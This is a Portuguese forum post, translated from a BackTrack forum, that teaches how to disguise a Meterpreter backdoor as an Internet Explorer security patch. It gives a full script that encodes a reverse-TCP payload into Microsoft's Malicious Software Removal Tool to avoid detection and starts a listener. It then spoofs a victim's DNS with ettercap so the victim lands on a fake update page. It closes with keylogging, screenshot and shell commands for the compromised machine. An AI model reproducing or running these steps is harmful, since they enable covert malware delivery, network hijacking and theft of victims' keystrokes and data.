"Encobrindo" um backdoor do meterpreter em um Patch do IE
Oi pessoal,
Aqui está um tutorial sobre como criar um backdoor no Meterpreter indetectável e encobri-lo como uma atualização de segurança do Internet Explorer. Eu criei um script bem básico que cria o backdoor no Meterpreter e inicia o multi/handler.
Vou injetar o payload no Microsoft Windows Malicious Software Removal Tool, que está disponível para download aqui.
Download details: Microsoft® Windows® Malicious Software Removal Tool (KB890830)
E eu vou usar o ettercap para fazer dns_spoof na vítima usando uma página falsa do Internet Explorer que seria equivalente à atualização de segurança.
Salve meu script como myscript.sh:
Code:
#!/bin/sh
clear
cd /pentest/exploits/framework3
echo "*************************************"
echo " creating a meterpreter backdoor "
echo "*************************************"
echo -n "lhost ?"
read lhost
echo -n "lport?"
read lport
echo -n "path to output file?"
read filename
echo -n "path to input file?"
read originalfile
echo "creating payload ..."
./msfpayload windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -x $originalfile -o $filename
echo "payload created !"
echo "starting multi/handler ..."
./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport E
Faça o meu script ser executável:
Code:
chmod 755 myscript.sh
Execute o meu script:
Code:
./myscript.sh lhost => your ip lport => 5555 output => /root/backdoor.exe input => /root/windows-kb890830-v3.12
Set up portforwarding no sysctrl do seu kernel (se for em outra localização do seu kernel, procure na internet algo sobre kernel e versão no Ubuntu)
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
Set up etter.dns localizado em /usr/share/ettercap
Code:
nano /usr/share/ettercap/etter.dns
Remova a parte onde microsoft esta forwarded para o linux e adicione as seguintes linhas:
Code:
* A Seu Ip
*.* A Seu Ip *.*.* A Seu Ip *.*.*.* A Seu Ip
Crie um site onde você pode baixar o arquivo ou baixar minha web.
http://home.base.be/%72%68%69%6E%63%...ous_update.rar
Eu usei o Photoshop para editar algumas fotos que eu encontrei a respeito do Internet Explorer,
Criei uma página simples em html, adicionei uma folha de estilo - CSS para posicionar o botão de download e para fazer a página parecer o mesmo com todas as resolução da tela.
Copie todos os arquivos para o diretório de publicação padrão do Apache /var/www/
Restart o Apache:
Code:
/etc/init.d/apache2 restart
Ative o DNS spoofing:
Code:
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /ip da vitima/ /gateway ip/
Gateway IP pode ser encontrado digitando isso no terminal:
Agora só temos que esperar a nossa vítima para executar o backdoor. Quando a vítima executar o backdoor, você deve ver algo como "session 1 opened". Você pode ver suas sessões ativas, digitando:
OBS: Isso se deve devido o backdoor ter sido criado no Metasploit/Meterpreter, então é o comando acima que visualiza as sessões do mesmo, bem como quase todos os comandos na sequência abaixo. Para saber mais sobre Metasploit/Meterpreter busque no nosso forum, fale com firebits, espreto, spwam, bhio e outros membros, mas seja "claro e objetivo" nas suas perguntas e post sempre no nosso forum.
Você pode saltar para a primeira sessão, digitando:
Há uma série de comandos que são capazes de executar. Você pode vê-los todos, escrevendo:
Alguns exemplos:
Code:
sysinfo => get system info
shell => jump into a cmd shell
keyscan_start => scan for keyboard input
keyscan_dump => dump keyboard input
keyscan_stop => stop scanning
screenshot => take screenshot
upload
download
Fonte: http://www.backtrack-linux.org/forum...-backdoor.html
Traduzido e Adaptado por @firebitsbr
Re: "Encobrindo" um backdoor do meterpreter em um Patch do IE
